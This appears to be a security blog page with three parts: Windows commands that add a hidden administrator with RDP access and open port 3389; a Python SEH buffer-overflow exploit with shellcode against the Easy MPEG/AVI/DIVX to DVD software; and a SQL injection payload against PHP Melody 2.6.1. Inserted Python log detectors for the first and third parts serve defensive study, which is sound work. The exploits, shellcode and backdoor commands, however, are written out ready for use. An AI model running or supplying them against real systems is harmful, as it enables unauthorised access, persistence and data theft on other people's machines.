Adding User Via Windows Command Line

Adding users Windows


Step 1 - Add User

net user 'username' 'password' /add

C:\WINDOWS\system32>net user thunder password /add 

Step 2 - Add the new User to Remote Desktop Group

net localgroup "Remote Desktop users" 'username' /add

C:\WINDOWS\system32>net localgroup "Remote Desktop users" thunder /add

Step 3 - Adding new user to Administrator group

net localgroup Administrators 'username' /add

C:\WINDOWS\system32>net localgroup Administrators thunder /add

All the above steps in a Single Command

C:\WINDOWS\system32>net user thunder password /add && net localgroup "Remote Desktop users" thunder /add && net localgroup Administrators thunder /add

Note: Make sure you have administrator privileges.
If a command returns an error, a password complexity policy may be enforced on the remote machine; try a more complex password.

Enable Remote Desktop Protocol Services


C:\WINDOWS\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f


Add Firewall Rule in Windows to Allow Remote Desktop Connection


C:\WINDOWS\system32>netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389
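The commands above leave a recognisable trail in process-creation logs. As an added example (not part of the original post), this Python code tags those command lines and flags a host where a new account is made an administrator and RDP is exposed within ten minutes; the host names, timestamps, account names and passwords in SAMPLE are constructed.

```python
import re

# Tags for the commands shown above; case-insensitive because cmd.exe
# ignores case in command names and switches.
NET = r'\bnet1?(?:\.exe)?"?\s+'
RULES = [
    ("user_created", re.compile(NET + r'user\s+\S+.*\s/add\b', re.I)),
    ("admin_added", re.compile(
        NET + r'localgroup\s+"?administrators"?\s.*/add\b', re.I)),
    ("rdp_group_added", re.compile(
        NET + r'localgroup\s+"?remote desktop users"?\s.*/add\b', re.I)),
    ("rdp_enabled", re.compile(
        r'\breg(?:\.exe)?"?\s+add\s.*fDenyTSConnections.*/d\s+0\b', re.I)),
    ("fw_3389_opened", re.compile(
        r'\bnetsh(?:\.exe)?"?\s+advfirewall\s+firewall\s+add\s+rule\b'
        r'(?=.*action=allow)(?=.*localport=3389\b)', re.I)),
]

def classify(cmdline):
    """Return the tags whose pattern matches one process command line."""
    return [tag for tag, rx in RULES if rx.search(cmdline)]

def hosts_with_full_chain(events, window=600):
    """events: (host, epoch_seconds, cmdline) tuples. Flag hosts where account
    creation, an Administrators add and RDP exposure fall inside `window`."""
    seen, flagged = {}, set()
    for host, ts, cmd in sorted(events, key=lambda e: e[1]):
        tags = seen.setdefault(host, {})
        for tag in classify(cmd):
            tags[tag] = ts
        recent = {t for t, when in tags.items() if ts - when <= window}
        if ({"user_created", "admin_added"} <= recent
                and recent & {"rdp_enabled", "fw_3389_opened"}):
            flagged.add(host)
    return flagged

# Constructed sample events (hypothetical hosts, times and account names).
SAMPLE = [
    ("WS01", 1000, "net user svc_tmp Example-Pw1 /add"),
    ("WS01", 1005, "net localgroup Administrators svc_tmp /add"),
    ("WS01", 1010, 'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    ("WS02", 2000, "net user"),
    ("WS02", 2010, 'netsh advfirewall firewall add rule name="web" dir=in action=allow protocol=TCP localport=443'),
    ("WS03", 100, "net user helpdesk2 Example-Pw1 /add"),
    ("WS03", 5000, "net localgroup administrators helpdesk2 /add"),
    ("WS03", 5001, 'netsh advfirewall firewall add rule name="rdp" dir=in action=allow protocol=TCP localport=3389'),
]
if __name__ == "__main__":
    print(hosts_with_full_chain(SAMPLE))
```

WS03 is not flagged because its account was created long before the group change and the firewall rule, which shows how the window trades missed slow activity against noise from unrelated administration.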

Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Field Buffer Overflow (SEH)


# Vulnerable Software: Easy MPEG/AVI/DIVX/WMV/RM to DVD
# Vulnerability Name: Buffer Overflow (SEH)
# Exploit Author: Venkat Rajgor
# Vendor Homepage: http://www.divxtodvd.net/
# Software Link: http://www.divxtodvd.net/easy_video_to_dvd.exe
# Tested On: Windows 7 x64
#############################################################################
Exploit Proof of Concept :

#!/usr/bin/python
###############################################################################
# Exploit Title: Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Field Buffer Overflow (SEH) 
# Date: 05-10-2017 
# Exploit Author: Venkat Rajgor 
# Vendor Homepage: http://www.divxtodvd.net/ 
# Software Link: http://www.divxtodvd.net/easy_video_to_dvd.exe 
# Tested On: Windows 7 x64 
#
# To reproduce the exploit:
# 1. Click Register 
# 2. In the "Enter User Name" field, paste the content of evil.txt 
############################################################################## 
filename="evil.txt" 
#Buffer
buffer = "\x41" * 1008 
#short Jump 
nSEH = "\xEB\x06\x90\x90" 
#SEH 
SEH = "\x59\x78\x03\x10" 
# Bad Chars 
badchars = "\x00\x0A\x0D\x1A" 

# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f c 

# Payload To Popup Calculator 

shell=( "\xba\xf5\xed\x50\xfa\xdb\xde\xd9\x74\x24\xf4\x5e\x29\xc9\xb1" "\x31\x31\x56\x13\x83\xc6\x04\x03\x56\xfa\x0f\xa5\x06\xec\x52" 
"\x46\xf7\xec\x32\xce\x12\xdd\x72\xb4\x57\x4d\x43\xbe\x3a\x61" 
"\x28\x92\xae\xf2\x5c\x3b\xc0\xb3\xeb\x1d\xef\x44\x47\x5d\x6e" 
"\xc6\x9a\xb2\x50\xf7\x54\xc7\x91\x30\x88\x2a\xc3\xe9\xc6\x99" 
"\xf4\x9e\x93\x21\x7e\xec\x32\x22\x63\xa4\x35\x03\x32\xbf\x6f" 
"\x83\xb4\x6c\x04\x8a\xae\x71\x21\x44\x44\x41\xdd\x57\x8c\x98" 
"\x1e\xfb\xf1\x15\xed\x05\x35\x91\x0e\x70\x4f\xe2\xb3\x83\x94" 
"\x99\x6f\x01\x0f\x39\xfb\xb1\xeb\xb8\x28\x27\x7f\xb6\x85\x23" 
"\x27\xda\x18\xe7\x53\xe6\x91\x06\xb4\x6f\xe1\x2c\x10\x34\xb1" 
"\x4d\x01\x90\x14\x71\x51\x7b\xc8\xd7\x19\x91\x1d\x6a\x40\xff" 
"\xe0\xf8\xfe\x4d\xe2\x02\x01\xe1\x8b\x33\x8a\x6e\xcb\xcb\x59" 
"\xcb\x23\x86\xc0\x7d\xac\x4f\x91\x3c\xb1\x6f\x4f\x02\xcc\xf3" 
"\x7a\xfa\x2b\xeb\x0e\xff\x70\xab\xe3\x8d\xe9\x5e\x04\x22\x09" 
"\x4b\x67\xa5\x99\x17\x46\x40\x1a\xbd\x96") 

evil = "\x90"*20 + shell
buffer = "A"*1008 + "\xEB\x06\x90\x90"+ "\x59\x78\x03\x10" + evil
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

##############################################################################
#End of Exploit

Screenshot for Reverse Shell:




PHP Melody 2.6.1 SQL Injection - CVE-2017-15081


###################################################
[+] Author : Venkat Rajgor
[+] Email : Venki9990@gmail.com
[+] Vulnerability : SQL injection
###################################################
E-mail ID : support@phpsugar.com
Download : http://www.phpsugar.com
Web : http://www.phpsugar.com
Price : $39 USD
###################################################
Vulnerable parameter: http://x.x.x.x/playlists.php?playlist=
Application : PHPSUGAR PHP Melody version 2.6.1
Vulnerability : PHPSUGAR PHP Melody 2.6.1 SQL Injection
###################################################

Description : In PHPSUGAR PHP Melody CMS 2.6.1, SQL Injection exists via the playlist parameter to playlists.php.

Payload Used : ' UNION SELECT null,concat(0x223c2f613e3c2f6469763e3c2f6469763e,version(),0x3c212d2d),null,null,null,null,null,null,null,null,null-- -
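
For log triage, an added example (not part of the original advisory): this Python code URL-decodes the playlist parameter from access-log lines, flags a UNION SELECT, and decodes the MySQL hex literals, which in the payload above are HTML closing tags and a comment opener wrapped around version(). The log lines, IP addresses and shortened column list are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

REQUEST_RX = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
UNION_RX = re.compile(r"\bunion\b(?:\s|/\*.*?\*/)+(?:all\s+)?select\b",
                      re.I | re.S)
HEX_RX = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b", re.I)

def triage(target, param="playlist"):
    """Return a finding dict if `param` carries a UNION SELECT, else None."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for value in query.get(param, []):  # parse_qs has already URL-decoded it
        if UNION_RX.search(value):
            return {
                "value": value,
                # MySQL 0x... literals decoded so the analyst sees the markup
                "hex_literals": [bytes.fromhex(h).decode("latin-1")
                                 for h in HEX_RX.findall(value)],
                "reads_version": bool(
                    re.search(r"\bversion\s*\(", value, re.I)),
            }
    return None

def scan(lines):
    """Yield (line_number, finding) for log lines that request playlists.php."""
    for n, line in enumerate(lines, 1):
        m = REQUEST_RX.search(line)
        if m and urlsplit(m.group(1)).path.endswith("/playlists.php"):
            finding = triage(m.group(1))
            if finding:
                yield n, finding

# Constructed access-log lines (documentation IPs, shortened column list).
SAMPLE_LOG = [
    '198.51.100.7 - - [05/Oct/2017:10:00:01 +0000] '
    '"GET /playlists.php?playlist=ab12cd HTTP/1.1" 200 5120',
    '198.51.100.9 - - [05/Oct/2017:10:00:02 +0000] '
    '"GET /playlists.php?playlist=%27%20UNION%20SELECT%20null,'
    'concat(0x223c2f613e3c2f6469763e3c2f6469763e,version(),0x3c212d2d),'
    'null,null--%20- HTTP/1.1" 200 5342',
    '198.51.100.7 - - [05/Oct/2017:10:00:03 +0000] '
    '"GET /index.php HTTP/1.1" 200 901',
]

if __name__ == "__main__":
    for n, finding in scan(SAMPLE_LOG):
        print(n, finding["hex_literals"], finding["reads_version"])
```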

###################################################
Proof of Concept :